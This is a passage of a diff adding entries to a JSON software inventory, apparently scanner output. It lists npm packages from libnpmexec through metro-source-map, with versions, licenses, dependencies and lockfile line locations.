+ "@npmcli/installed-package-contents@3.0.0", + "binary-extensions@3.1.0", + "diff@8.0.2", + "minimatch@10.0.3", + "npm-package-arg@13.0.1", + "pacote@21.0.3", + "tar@7.5.1" + ], + "Locations": [ + { + "StartLine": 14627, + "EndLine": 14644 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "libnpmexec@10.1.8", + "Name": "libnpmexec", + "Identifier": { + "PURL": "pkg:npm/libnpmexec@10.1.8", + "UID": "7546ae74cc43934f" + }, + "Version": "10.1.8", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/arborist@9.1.6", + "@npmcli/package-json@7.0.1", + "@npmcli/run-script@10.0.0", + "ci-info@4.3.1", + "npm-package-arg@13.0.1", + "pacote@21.0.3", + "proc-log@5.0.0", + "promise-retry@2.0.1", + "read@4.1.0", + "semver@7.7.3", + "signal-exit@4.1.0", + "walk-up-path@4.0.0" + ], + "Locations": [ + { + "StartLine": 14645, + "EndLine": 14666 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "libnpmfund@7.0.9", + "Name": "libnpmfund", + "Identifier": { + "PURL": "pkg:npm/libnpmfund@7.0.9", + "UID": "3f0f67d32ab0af46" + }, + "Version": "7.0.9", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/arborist@9.1.6" + ], + "Locations": [ + { + "StartLine": 14667, + "EndLine": 14677 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "libnpmorg@8.0.1", + "Name": "libnpmorg", + "Identifier": { + "PURL": "pkg:npm/libnpmorg@8.0.1", + "UID": "8dff2e7c84143e00" + }, + "Version": "8.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "aproba@2.1.0", + "npm-registry-fetch@19.0.0" + ], + "Locations": [ + { + "StartLine": 14678, + "EndLine": 14691 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "libnpmpack@9.0.9", + "Name": "libnpmpack", + "Identifier": { + "PURL": "pkg:npm/libnpmpack@9.0.9", + "UID": "74824c3e29531652" + }, + "Version": "9.0.9", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/arborist@9.1.6", + "@npmcli/run-script@10.0.0", + "npm-package-arg@13.0.1", + "pacote@21.0.3" + ], + "Locations": [ + { + "StartLine": 14692, + "EndLine": 14705 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "libnpmpublish@11.1.2", + "Name": "libnpmpublish", + "Identifier": { + "PURL": "pkg:npm/libnpmpublish@11.1.2", + "UID": "4e2a2b4a837201c3" + }, + "Version": "11.1.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/package-json@7.0.1", + "ci-info@4.3.1", + "npm-package-arg@13.0.1", + "npm-registry-fetch@19.0.0", + "proc-log@5.0.0", + "semver@7.7.3", + "sigstore@4.0.0", + "ssri@12.0.0" + ], + "Locations": [ + { + "StartLine": 14706, + "EndLine": 14723 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "libnpmsearch@9.0.1", + "Name": "libnpmsearch", + "Identifier": { + "PURL": "pkg:npm/libnpmsearch@9.0.1", + "UID": "a431f251222d2888" + }, + "Version": "9.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "npm-registry-fetch@19.0.0" + ], + "Locations": [ + { + "StartLine": 14724, + "EndLine": 14736 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "libnpmteam@8.0.2", + "Name": "libnpmteam", + "Identifier": { + "PURL": "pkg:npm/libnpmteam@8.0.2", + "UID": "eb662154a7a530db" + }, + "Version": "8.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "aproba@2.1.0", + "npm-registry-fetch@19.0.0" + ], + "Locations": [ + { + "StartLine": 14737, + "EndLine": 14750 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "libnpmversion@8.0.2", + "Name": "libnpmversion", + "Identifier": { + "PURL": "pkg:npm/libnpmversion@8.0.2", + "UID": "a44ebd969b8d37b" + }, + "Version": "8.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/git@7.0.0", + "@npmcli/run-script@10.0.0", + "json-parse-even-better-errors@4.0.0", + "proc-log@5.0.0", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 14751, + "EndLine": 14765 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lighthouse-logger@1.4.2", + "Name": "lighthouse-logger", + "Identifier": { + "PURL": "pkg:npm/lighthouse-logger@1.4.2", + "UID": "ca144bef29034d7d" + }, + "Version": "1.4.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@2.6.9", + "marky@1.3.0" + ], + "Locations": [ + { + "StartLine": 11806, + "EndLine": 11815 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lines-and-columns@1.2.4", + "Name": "lines-and-columns", + "Identifier": { + "PURL": "pkg:npm/lines-and-columns@1.2.4", + "UID": "d69c046e02a86982" + }, + "Version": "1.2.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11831, + "EndLine": 11836 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "linkify-it@2.2.0", + "Name": "linkify-it", + "Identifier": { + "PURL": "pkg:npm/linkify-it@2.2.0", + "UID": "e60fc6d846ee32c" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "uc.micro@1.0.6" + ], + "Locations": [ + { + "StartLine": 11837, + "EndLine": 11845 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "locate-path@3.0.0", + "Name": "locate-path", + "Identifier": { + "PURL": "pkg:npm/locate-path@3.0.0", + "UID": "b8486ee3af65519" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-locate@3.0.0", + "path-exists@3.0.0" + ], + "Locations": [ + { + "StartLine": 16696, + "EndLine": 16708 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "locate-path@5.0.0", + "Name": "locate-path", + "Identifier": { + "PURL": "pkg:npm/locate-path@5.0.0", + "UID": "8b8b2c5ff93c73f6" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-locate@4.1.0" + ], + "Locations": [ + { + "StartLine": 3467, + "EndLine": 3478 + }, + { + "StartLine": 11961, + "EndLine": 11973 + }, + { + "StartLine": 16630, + "EndLine": 16642 + }, + { + "StartLine": 18814, + "EndLine": 18825 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "locate-path@6.0.0", + "Name": "locate-path", + "Identifier": { + "PURL": "pkg:npm/locate-path@6.0.0", + "UID": "7424bfd120d6a95" + }, + "Version": "6.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-locate@5.0.0" + ], + "Locations": [ + { + "StartLine": 11846, + "EndLine": 11860 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash@4.17.21", + "Name": "lodash", + "Identifier": { + "PURL": "pkg:npm/lodash@4.17.21", + "UID": "3422108e237b34df" + }, + "Version": "4.17.21", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11861, + "EndLine": 11866 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.camelcase@4.3.0", + "Name": "lodash.camelcase", + "Identifier": { + "PURL": "pkg:npm/lodash.camelcase@4.3.0", + "UID": "41d52f6f121a4276" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11867, + "EndLine": 11872 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.debounce@4.0.8", + "Name": "lodash.debounce", + "Identifier": { + "PURL": "pkg:npm/lodash.debounce@4.0.8", + "UID": "ae230e3c690e5245" + }, + "Version": "4.0.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11873, + "EndLine": 11878 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.map@4.6.0", + "Name": "lodash.map", + "Identifier": { + "PURL": "pkg:npm/lodash.map@4.6.0", + "UID": "7e824149fedc30c1" + }, + "Version": "4.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11879, + "EndLine": 11884 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.throttle@4.1.1", + "Name": "lodash.throttle", + "Identifier": { + "PURL": "pkg:npm/lodash.throttle@4.1.1", + "UID": "50f67d03a67e7188" + }, + "Version": "4.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11892, + "EndLine": 11897 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.zipobject@4.1.3", + "Name": "lodash.zipobject", + "Identifier": { + "PURL": "pkg:npm/lodash.zipobject@4.1.3", + "UID": "c2366a6ffcf8bdf1" + }, + "Version": "4.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11898, + "EndLine": 11903 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "log-symbols@4.1.0", + "Name": "log-symbols", + "Identifier": { + "PURL": "pkg:npm/log-symbols@4.1.0", + "UID": "6c84123cc2f7f549" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "chalk@4.1.2", + "is-unicode-supported@0.1.0" + ], + "Locations": [ + { + "StartLine": 11904, + "EndLine": 11919 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "logkitty@0.7.1", + "Name": "logkitty", + "Identifier": { + "PURL": "pkg:npm/logkitty@0.7.1", + "UID": "be43a5847c89ca2c" + }, + "Version": "0.7.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-fragments@0.2.1", + "dayjs@1.11.18", + "yargs@15.4.1" + ], + "Locations": [ + { + "StartLine": 11920, + "EndLine": 11934 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "long@5.3.2", + "Name": "long", + "Identifier": { + "PURL": "pkg:npm/long@5.3.2", + "UID": "497043a73b7e0cce" + }, + "Version": "5.3.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12062, + "EndLine": 12067 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "loose-envify@1.4.0", + "Name": "loose-envify", + "Identifier": { + "PURL": "pkg:npm/loose-envify@1.4.0", + "UID": "776d2321079d4e72" + }, + "Version": "1.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "js-tokens@4.0.0" + ], + "Locations": [ + { + "StartLine": 12068, + "EndLine": 12079 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lower-case@2.0.2", + "Name": "lower-case", + "Identifier": { + "PURL": "pkg:npm/lower-case@2.0.2", + "UID": "fe61975c5e5a8299" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 12080, + "EndLine": 12088 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lru-cache@10.4.3", + "Name": "lru-cache", + "Identifier": { + "PURL": "pkg:npm/lru-cache@10.4.3", + "UID": "fd2f9b4bffeabd74" + }, + "Version": "10.4.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15053, + "EndLine": 15059 + }, + { + "StartLine": 16552, + "EndLine": 16557 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lru-cache@11.2.2", + "Name": "lru-cache", + "Identifier": { + "PURL": "pkg:npm/lru-cache@11.2.2", + "UID": "3621409c86852fcc" + }, + "Version": "11.2.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14766, + "EndLine": 14773 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lru-cache@5.1.1", + "Name": "lru-cache", + "Identifier": { + "PURL": "pkg:npm/lru-cache@5.1.1", + "UID": "4b2141d9aa807fc3" + }, + "Version": "5.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "yallist@3.1.1" + ], + "Locations": [ + { + "StartLine": 12095, + "EndLine": 12103 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lru-cache@6.0.0", + "Name": "lru-cache", + "Identifier": { + "PURL": "pkg:npm/lru-cache@6.0.0", + "UID": "4751333698825ad6" + }, + "Version": "6.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "yallist@4.0.0" + ], + "Locations": [ + { + "StartLine": 6852, + "EndLine": 6864 + }, + { + "StartLine": 10024, + "EndLine": 10035 + }, + { + "StartLine": 12188, + "EndLine": 12200 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "make-fetch-happen@14.0.3", + "Name": "make-fetch-happen", + "Identifier": { + "PURL": "pkg:npm/make-fetch-happen@14.0.3", + "UID": "1e0e7a3cd68d6531" + }, + "Version": "14.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/agent@3.0.0", + "cacache@19.0.1", + "http-cache-semantics@4.2.0", + "minipass-fetch@4.0.1", + "minipass-flush@1.0.5", + "minipass-pipeline@1.2.4", + "minipass@7.1.2", + "negotiator@1.0.0", + "proc-log@5.0.0", + "promise-retry@2.0.1", + "ssri@12.0.0" + ], + "Locations": [ + { + "StartLine": 15060, + "EndLine": 15080 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "make-fetch-happen@15.0.2", + "Name": "make-fetch-happen", + "Identifier": { + "PURL": "pkg:npm/make-fetch-happen@15.0.2", + "UID": "2d316d4ac04ae5c6" + }, + "Version": "15.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/agent@4.0.0", + "cacache@20.0.1", + "http-cache-semantics@4.2.0", + "minipass-fetch@4.0.1", + "minipass-flush@1.0.5", + "minipass-pipeline@1.2.4", + "minipass@7.1.2", + "negotiator@1.0.0", + "proc-log@5.0.0", + "promise-retry@2.0.1", + "ssri@12.0.0" + ], + "Locations": [ + { + "StartLine": 14774, + "EndLine": 14794 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "make-fetch-happen@9.1.0", + "Name": "make-fetch-happen", + "Identifier": { + "PURL": "pkg:npm/make-fetch-happen@9.1.0", + "UID": "86b4cb7bc75f6ae0" + }, + "Version": "9.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agentkeepalive@4.6.0", + "cacache@15.3.0", + "http-cache-semantics@4.2.0", + "http-proxy-agent@4.0.1", + "https-proxy-agent@5.0.1", + "is-lambda@1.0.1", + "lru-cache@6.0.0", + "minipass-collect@1.0.2", + "minipass-fetch@1.4.1", + "minipass-flush@1.0.5", + "minipass-pipeline@1.2.4", + "minipass@3.3.6", + "negotiator@0.6.4", + "promise-retry@2.0.1", + "socks-proxy-agent@6.2.1", + "ssri@8.0.1" + ], + "Locations": [ + { + "StartLine": 12133, + "EndLine": 12160 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "makeerror@1.0.12", + "Name": "makeerror", + "Identifier": { + "PURL": "pkg:npm/makeerror@1.0.12", + "UID": "76341cc096536b9b" + }, + "Version": "1.0.12", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "tmpl@1.0.5" + ], + "Locations": [ + { + "StartLine": 12221, + "EndLine": 12229 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "map-obj@1.0.1", + "Name": "map-obj", + "Identifier": { + "PURL": "pkg:npm/map-obj@1.0.1", + "UID": "521949e923714d60" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7720, + "EndLine": 7728 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "map-obj@4.3.0", + "Name": "map-obj", + "Identifier": { + "PURL": "pkg:npm/map-obj@4.3.0", + "UID": "ae05b49b4ae64b4c" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12230, + "EndLine": 12241 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "markdown-it@10.0.0", + "Name": "markdown-it", + "Identifier": { + "PURL": "pkg:npm/markdown-it@10.0.0", + "UID": "b068d65a3a75e116" + }, + "Version": "10.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "argparse@1.0.10", + "entities@2.0.3", + "linkify-it@2.2.0", + "mdurl@1.0.1", + "uc.micro@1.0.6" + ], + "Locations": [ + { + "StartLine": 12242, + "EndLine": 12257 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "marky@1.3.0", + "Name": "marky", + "Identifier": { + "PURL": "pkg:npm/marky@1.3.0", + "UID": "86b6357b2e9cad6f" + }, + "Version": "1.3.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12273, + "EndLine": 12278 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "math-intrinsics@1.1.0", + "Name": "math-intrinsics", + "Identifier": { + "PURL": "pkg:npm/math-intrinsics@1.1.0", + "UID": "9d73ce4a2ae8dd9b" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12279, + "EndLine": 12287 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mdn-data@2.0.14", + "Name": "mdn-data", + "Identifier": { + "PURL": "pkg:npm/mdn-data@2.0.14", + "UID": "9248b61ca2bfb038" + }, + "Version": "2.0.14", + "Licenses": [ + "CC0-1.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12288, + "EndLine": 12293 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mdn-data@2.0.28", + "Name": "mdn-data", + "Identifier": { + "PURL": "pkg:npm/mdn-data@2.0.28", + "UID": "d45209903f7f4c75" + }, + "Version": "2.0.28", + "Licenses": [ + "CC0-1.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7604, + "EndLine": 7609 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mdn-data@2.0.30", + "Name": "mdn-data", + "Identifier": { + "PURL": "pkg:npm/mdn-data@2.0.30", + "UID": "640e61a8b55d94e7" + }, + "Version": "2.0.30", + "Licenses": [ + "CC0-1.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20445, + "EndLine": 20450 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mdurl@1.0.1", + "Name": "mdurl", + "Identifier": { + "PURL": "pkg:npm/mdurl@1.0.1", + "UID": "57f1aa4167ee4c69" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12294, + "EndLine": 12299 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "media-typer@0.3.0", + "Name": "media-typer", + "Identifier": { + "PURL": "pkg:npm/media-typer@0.3.0", + "UID": "9df5c51c24edacff" + }, + "Version": "0.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12300, + "EndLine": 12309 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "memoize-one@5.2.1", + "Name": "memoize-one", + "Identifier": { + "PURL": "pkg:npm/memoize-one@5.2.1", + "UID": "5d8dc9ee8bc491cb" + }, + "Version": "5.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12310, + "EndLine": 12315 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "meow@9.0.0", + "Name": "meow", + "Identifier": { + "PURL": "pkg:npm/meow@9.0.0", + "UID": "685004b2009c5472" + }, + "Version": "9.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/minimist@1.2.5", + "camelcase-keys@6.2.2", + "decamelize-keys@1.1.1", + "decamelize@1.2.0", + "hard-rejection@2.1.0", + "minimist-options@4.1.0", + "normalize-package-data@3.0.3", + "read-pkg-up@7.0.1", + "redent@3.0.0", + "trim-newlines@3.0.1", + "type-fest@0.18.1", + "yargs-parser@20.2.9" + ], + "Locations": [ + { + "StartLine": 12316, + "EndLine": 12341 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "merge-options@3.0.4", + "Name": "merge-options", + "Identifier": { + "PURL": "pkg:npm/merge-options@3.0.4", + "UID": "7623e0ee3dc25e2e" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-plain-obj@2.1.0" + ], + "Locations": [ + { + "StartLine": 12363, + "EndLine": 12374 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "merge-stream@2.0.0", + "Name": "merge-stream", + "Identifier": { + "PURL": "pkg:npm/merge-stream@2.0.0", + "UID": "4f4303a6ab9a064f" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12375, + "EndLine": 12380 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "merge2@1.4.1", + "Name": "merge2", + "Identifier": { + "PURL": "pkg:npm/merge2@1.4.1", + "UID": "5d7cb21cf7c58e4" + }, + "Version": "1.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12381, + "EndLine": 12389 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "metro@0.83.3", + "Name": "metro", + "Identifier": { + "PURL": "pkg:npm/metro@0.83.3", + "UID": "bbbb0009a784fdfd" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/code-frame@7.27.1", + "@babel/core@7.28.4", + "@babel/generator@7.28.3", + "@babel/parser@7.28.4", + "@babel/template@7.27.2", + "@babel/traverse@7.28.4", + "@babel/types@7.28.4", + "accepts@1.3.8", + "chalk@4.1.2", + "ci-info@2.0.0", + "connect@3.7.0", + "debug@4.4.3", + "error-stack-parser@2.1.4", + "flow-enums-runtime@0.0.6", + "graceful-fs@4.2.11", + "hermes-parser@0.32.0", + "image-size@1.2.1", + "invariant@2.2.4", + "jest-worker@29.7.0", + "jsc-safe-url@0.2.4", + "lodash.throttle@4.1.1", + "metro-babel-transformer@0.83.3", + "metro-cache-key@0.83.3", + "metro-cache@0.83.3", + "metro-config@0.83.3", + "metro-core@0.83.3", + "metro-file-map@0.83.3", + "metro-resolver@0.83.3", + "metro-runtime@0.83.3", + "metro-source-map@0.83.3", + "metro-symbolicate@0.83.3", + "metro-transform-plugins@0.83.3", + "metro-transform-worker@0.83.3", + "mime-types@2.1.35", + "nullthrows@1.1.1", + "serialize-error@2.1.0", + "source-map@0.5.7", + "throat@5.0.0", + "ws@7.5.10", + "yargs@17.7.2" + ], + "Locations": [ + { + "StartLine": 12390, + "EndLine": 12443 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "metro-babel-transformer@0.83.3", + "Name": "metro-babel-transformer", + "Identifier": { + "PURL": "pkg:npm/metro-babel-transformer@0.83.3", + "UID": "5a484d017b3a4004" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "flow-enums-runtime@0.0.6", + "hermes-parser@0.32.0", + "nullthrows@1.1.1" + ], + "Locations": [ + { + "StartLine": 12444, + "EndLine": 12458 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "metro-cache@0.83.3", + "Name": "metro-cache", + "Identifier": { + "PURL": "pkg:npm/metro-cache@0.83.3", + "UID": "fd2f34711da0383c" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "exponential-backoff@3.1.2", + "flow-enums-runtime@0.0.6", + "https-proxy-agent@7.0.6", + "metro-core@0.83.3" + ], + "Locations": [ + { + "StartLine": 12474, + "EndLine": 12488 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "metro-cache-key@0.83.3", + "Name": "metro-cache-key", + "Identifier": { + "PURL": "pkg:npm/metro-cache-key@0.83.3", + "UID": "84eaee5ff4cac930" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "flow-enums-runtime@0.0.6" + ], + "Locations": [ + { + "StartLine": 12489, + "EndLine": 12500 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "metro-config@0.83.3", + "Name": "metro-config", + "Identifier": { + "PURL": "pkg:npm/metro-config@0.83.3", + "UID": "c928b465fc35dbb6" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "connect@3.7.0", + "flow-enums-runtime@0.0.6", + "jest-validate@29.7.0", + "metro-cache@0.83.3", + "metro-core@0.83.3", + "metro-runtime@0.83.3", + "metro@0.83.3", + "yaml@2.8.1" + ], + "Locations": [ + { + "StartLine": 12501, + "EndLine": 12519 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "metro-core@0.83.3", + "Name": "metro-core", + "Identifier": { + "PURL": "pkg:npm/metro-core@0.83.3", + "UID": "ffc6bd8a6b52d08d" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "flow-enums-runtime@0.0.6", + "lodash.throttle@4.1.1", + "metro-resolver@0.83.3" + ], + "Locations": [ + { + "StartLine": 12520, + "EndLine": 12533 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "metro-file-map@0.83.3", + "Name": "metro-file-map", + "Identifier": { + "PURL": "pkg:npm/metro-file-map@0.83.3", + "UID": "ec5b5ae50427d814" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@4.4.3", + "fb-watchman@2.0.2", + "flow-enums-runtime@0.0.6", + "graceful-fs@4.2.11", + "invariant@2.2.4", + "jest-worker@29.7.0", + "micromatch@4.0.8", + "nullthrows@1.1.1", + "walker@1.0.8" + ], + "Locations": [ + { + "StartLine": 12534, + "EndLine": 12553 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "metro-minify-terser@0.83.3", + "Name": "metro-minify-terser", + "Identifier": { + "PURL": "pkg:npm/metro-minify-terser@0.83.3", + "UID": "8e07a369d569f904" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "flow-enums-runtime@0.0.6", + "terser@5.44.0" + ], + "Locations": [ + { + "StartLine": 12554, + "EndLine": 12566 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "metro-resolver@0.83.3", + "Name": "metro-resolver", + "Identifier": { + "PURL": "pkg:npm/metro-resolver@0.83.3", + "UID": "8873a951c4d3469d" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "flow-enums-runtime@0.0.6" + ], + "Locations": [ + { + "StartLine": 12567, + "EndLine": 12578 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "metro-runtime@0.83.3", + "Name": "metro-runtime", + "Identifier": { + "PURL": "pkg:npm/metro-runtime@0.83.3", + "UID": "6952bce8e1ae2e73" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/runtime@7.28.4", + "flow-enums-runtime@0.0.6" + ], + "Locations": [ + { + "StartLine": 12579, + "EndLine": 12591 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "metro-source-map@0.83.3", + "Name": "metro-source-map", + "Identifier": { + "PURL": "pkg:npm/metro-source-map@0.83.3", + "UID": "34ebb542669fb6c3" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/traverse--for-generate-function-map@7.28.4", + "@babel/traverse@7.28.4", + "@babel/types@7.28.4", + "flow-enums-runtime@0.0.6", + "invariant@2.2.4", + "metro-symbolicate@0.83.3", + "nullthrows@1.1.1", + "ob1@0.83.3", + "source-map@0.5.7", + "vlq@1.0.1" + ], + 